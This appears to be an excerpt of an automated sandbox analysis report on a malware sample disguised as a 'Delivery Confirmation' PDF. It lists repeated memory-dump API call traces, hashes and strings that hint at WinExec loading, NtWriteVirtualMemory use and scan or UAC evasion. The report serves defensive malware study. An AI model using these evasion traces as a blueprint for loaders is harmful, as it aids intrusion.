                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                  • String ID: Kernel32$WinExec
                                                                  • API String ID: 2292790416-3609268280
                                                                  • Opcode ID: bdeaf50736ceb09bb19b732eb3b22ce89d218e3fa5cc20c362fa96457945faec
                                                                  • Instruction ID: 98395e242c32fa54c8dd6b7c3d1a1564835021aba3a6a4427ec389fad7d42b9e
                                                                  • Opcode Fuzzy Hash: bdeaf50736ceb09bb19b732eb3b22ce89d218e3fa5cc20c362fa96457945faec
                                                                  • Instruction Fuzzy Hash: 54F08C74640204BFEB21EFA4DC51B5A77ADEB48B00F518520B609E3A50DA74AD009F28
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02CE5CFC,?,?,02CE3888,00000001), ref: 02CE5C10
                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02CE5CFC,?,?,02CE3888,00000001), ref: 02CE5C3E
                                                                    • Part of subcall function 02CD7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02CE3888,02CE5C7E,00000000,02CE5CFC,?,?,02CE3888), ref: 02CD7D66
                                                                    • Part of subcall function 02CD7F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02CE3888,02CE5C99,00000000,02CE5CFC,?,?,02CE3888,00000001), ref: 02CD7F3F
                                                                  • GetLastError.KERNEL32(00000000,02CE5CFC,?,?,02CE3888,00000001), ref: 02CE5CA3
                                                                    • Part of subcall function 02CDA700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02CDC361,00000000,02CDC3BB), ref: 02CDA71F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                  • String ID:
                                                                  • API String ID: 503785936-0
                                                                  • Opcode ID: bbd1ee4b0ef15ec16eb5bc8b3b2a8a116639a996a9ca76323eeea78251e6fbfd
                                                                  • Instruction ID: 859100f54b1b7f82b7db33bc3e4ad387b96d549577e275ba102d83032f5175a8
                                                                  • Opcode Fuzzy Hash: bbd1ee4b0ef15ec16eb5bc8b3b2a8a116639a996a9ca76323eeea78251e6fbfd
                                                                  • Instruction Fuzzy Hash: B7316474A006449FDF10EFA4C8817AEB7F6AF48314F918569EA04E7380D7755E05DFA1
                                                                  APIs
                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02E25914), ref: 02CEE704
                                                                  • RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02CEE76F), ref: 02CEE73C
                                                                  • RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02CEE76F), ref: 02CEE747
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 779948276-0
                                                                  • Opcode ID: 94c932c91f4f7d03103eb99d592b33efb1667595c308f67eb0f39c0e89abdfbe
                                                                  • Instruction ID: 8c01958a760cce47679d61c22d153bda9433dc462f3750ec1e3bd1be2abf1cc5
                                                                  • Opcode Fuzzy Hash: 94c932c91f4f7d03103eb99d592b33efb1667595c308f67eb0f39c0e89abdfbe
                                                                  • Instruction Fuzzy Hash: 01114F71650204AFEB28EFA9D981A6E77EDEB09360F914460F705E7250D730EE81EE60
                                                                  APIs
                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02E25914), ref: 02CEE704
                                                                  • RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02CEE76F), ref: 02CEE73C
                                                                  • RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02CEE76F), ref: 02CEE747
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 779948276-0
                                                                  • Opcode ID: b7c6fb7b2cc2343ce7ecb12b118b6446159cf033a9b41b76e360b04af3ad26e7
                                                                  • Instruction ID: b8e313629fbbbc7fe032e78423282fcdcc239aef34b7e17950aa0807d347277c
                                                                  • Opcode Fuzzy Hash: b7c6fb7b2cc2343ce7ecb12b118b6446159cf033a9b41b76e360b04af3ad26e7
                                                                  • Instruction Fuzzy Hash: 31114F71650204AFEB28EFA9D981A5E77ADEB09360F914460F705E7250D730EA81EE60
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 66c5830988838e17609a28cda1d20b917345ca845c808715f9e869f73f3e428f
                                                                  • Instruction ID: 4a2baf8ee2fe54fef4a01b8223119d5265d15ccad10b3717f2e6b7299650d907
                                                                  • Opcode Fuzzy Hash: 66c5830988838e17609a28cda1d20b917345ca845c808715f9e869f73f3e428f
                                                                  • Instruction Fuzzy Hash: E0F0F624B0421087C7297B3ACDC467D279AAFC1720B50142AE78F9F285CB34DD45DB62
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(02CEE950), ref: 02CD4C1A
                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 02CD4D07
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02CD4D19
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: String$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 986138563-0
                                                                  • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                  • Instruction ID: 51c9606e5d1424fa8b8471fc813d58bb9a89eb03442c21739c94cc8a0294df62
                                                                  • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                  • Instruction Fuzzy Hash: 72E012B81056016EFB282F619C40B37372AAFC2741B184899EB04CA155D775C441BD34
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(?), ref: 02CE7362
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID: H
                                                                  • API String ID: 3341692771-2852464175
                                                                  • Opcode ID: be562c6836cb2c0d690ba071ca15b79a82a9299565d2065784382d42ecdf8ec1
                                                                  • Instruction ID: 524c59d3232b3afe600089cc40f2748f6f9ccdd71fb2db31b4e38c4c3a54176a
                                                                  • Opcode Fuzzy Hash: be562c6836cb2c0d690ba071ca15b79a82a9299565d2065784382d42ecdf8ec1
                                                                  • Instruction Fuzzy Hash: 3AB1D274A01608DFDB14CFA9D880A9DFBF6FF89314F148569E80AAB360D735A949CF50
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,02CE890B), ref: 02CE8858
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CE8090,?,?,00000000,?,02CE7A06,ntdll,00000000,00000000,02CE7A4B,?,?,00000000), ref: 02CE805E
                                                                    • Part of subcall function 02CE8020: GetModuleHandleA.KERNELBASE(?), ref: 02CE8072
                                                                    • Part of subcall function 02CE80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CE8150,?,?,00000000,00000000,?,02CE8069,00000000,KernelBASE,00000000,00000000,02CE8090), ref: 02CE8115
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CE811B
                                                                    • Part of subcall function 02CE80C8: GetProcAddress.KERNEL32(?,?), ref: 02CE812D
                                                                    • Part of subcall function 02CE7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CE7D74
                                                                  • FreeLibrary.KERNEL32(74F60000,00000000,02D31388,Function_000065D8,00000004,02D31398,02D31388,05F5E0FF,00000040,02D3139C,74F60000,00000000,00000000,00000000,00000000,02CE890B), ref: 02CE88EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                  • String ID:
                                                                  • API String ID: 3283153180-0
                                                                  • Opcode ID: 4a6a43a58a6e793034d91940e64e72819ea29020f60c4757524fa1418ee0cace
                                                                  • Instruction ID: 881f5073ff8178946e91c22c7e8132ee53f417dd98a0d4a7ab0359b64a8a25f5
                                                                  • Opcode Fuzzy Hash: 4a6a43a58a6e793034d91940e64e72819ea29020f60c4757524fa1418ee0cace
                                                                  • Instruction Fuzzy Hash: 6B118B70A40304ABEF11FBE8E806A5E77AEEB45700F5104A4B349A3B90DA34DE05EF54
                                                                  APIs
                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 02CDE709
                                                                    • Part of subcall function 02CDE2EC: VariantClear.OLEAUT32(?), ref: 02CDE2FB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCopy
                                                                  • String ID:
                                                                  • API String ID: 274517740-0
                                                                  • Opcode ID: 63c90c08bd71b620d6c40e2d4dffbb562b64040dc96673555797db9093e7f908
                                                                  • Instruction ID: f671a904135e41ef792ea5efa293777e4659134abac1651fe60d256d85e7cec3
                                                                  • Opcode Fuzzy Hash: 63c90c08bd71b620d6c40e2d4dffbb562b64040dc96673555797db9093e7f908
                                                                  • Instruction Fuzzy Hash: 0211C42470031087CBA4AF29CDC466BB7DAEFC5751B169426EB4B8F355EB31CC41DAA2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: InitVariant
                                                                  • String ID:
                                                                  • API String ID: 1927566239-0
                                                                  • Opcode ID: 62fa31f31535911bbcef39f30a2638ddf77f095d1a4c4bc438c4d4d66e2774f7
                                                                  • Instruction ID: 02c089205e46491efbc3534d165b493d620b5575639af4d0dcc6546cd058dd8c
                                                                  • Opcode Fuzzy Hash: 62fa31f31535911bbcef39f30a2638ddf77f095d1a4c4bc438c4d4d66e2774f7
                                                                  • Instruction Fuzzy Hash: A3314D71A00209AFDB10EFA8C985ABE77E8FB4C304F444565FB09DB250D774EA51CBA2
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02CE6D41,?,?,?,00000000), ref: 02CE6D21
                                                                    • Part of subcall function 02CD4C0C: SysFreeString.OLEAUT32(02CEE950), ref: 02CD4C1A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromProgString
                                                                  • String ID:
                                                                  • API String ID: 4225568880-0
                                                                  • Opcode ID: 4238f2276da9ed30d9b1bae35663567dbfe934a46700898f82246a1feece0f99
                                                                  • Instruction ID: f702fa829b12012b138a855c360663df63e644dd14014da889dab6cc696b818d
                                                                  • Opcode Fuzzy Hash: 4238f2276da9ed30d9b1bae35663567dbfe934a46700898f82246a1feece0f99
                                                                  • Instruction Fuzzy Hash: 8FE06531614644BBEB15EBA1CC5196E77ADEB49B10BA14471E601D3510DA74AE00EC60
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(02CD0000,?,00000105), ref: 02CD5832
                                                                    • Part of subcall function 02CD5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5A94
                                                                    • Part of subcall function 02CD5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5AB2
                                                                    • Part of subcall function 02CD5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02CD0000,02CFD790), ref: 02CD5AD0
                                                                    • Part of subcall function 02CD5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02CD5AEE
                                                                    • Part of subcall function 02CD5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02CD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02CD5B37
                                                                    • Part of subcall function 02CD5A78: RegQueryValueExA.ADVAPI32(?,02CD5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02CD5B7D,?,80000001), ref: 02CD5B55
                                                                    • Part of subcall function 02CD5A78: RegCloseKey.ADVAPI32(?,02CD5B84,00000000,?,?,00000000,02CD5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02CD5B77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                  • String ID:
                                                                  • API String ID: 2796650324-0
                                                                  • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                  • Instruction ID: 21111016b8971b01cdf9c8a5ade1547d5c40e5913365453846fae190ac2f0a5e
                                                                  • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                  • Instruction Fuzzy Hash: 06E06D71A402148FCB10DE58C8C0A5637D9AF08790F440565EE58DF34AD3B0DA108BD0
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02CD7DB0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                  • Instruction ID: f73089e79baac44defc6fb1cefc6f96633c52fee060402ee3b6c6de8d205ea59
                                                                  • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                  • Instruction Fuzzy Hash: C3D05B763081107AD220995A6C44EB75BDCCBC9770F100639F758C3180D7308C05C671
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02CEF8CC,ScanString,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanString,02D3137C,02CFAFD8,UacScan,02D3137C,02CFAFD8,UacInitialize), ref: 02CD7E23
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
                                                                  • Instruction ID: a772036f64aebbe0fa2d72a80205f25acb853b96368384ee8229dc9bceb50bf5
                                                                  • Opcode Fuzzy Hash: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
                                                                  • Instruction Fuzzy Hash: CEC08CA12022400E5A6461FC1CC400A52CC098513A3A40B79B338C6FD2E331985B7850
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02CF2A49,ScanString,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,ScanBuffer,02D3137C,02CFAFD8,OpenSession,02D3137C,02CFAFD8,Initialize), ref: 02CD7E47
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2261045474.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2261024561.0000000002CD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002CFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261155712.0000000002D2E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002D31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E25000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2261399651.0000000002E28000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2cd0000_Delivery Confirmation Forms - Contact Form TS4047117 pdf.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
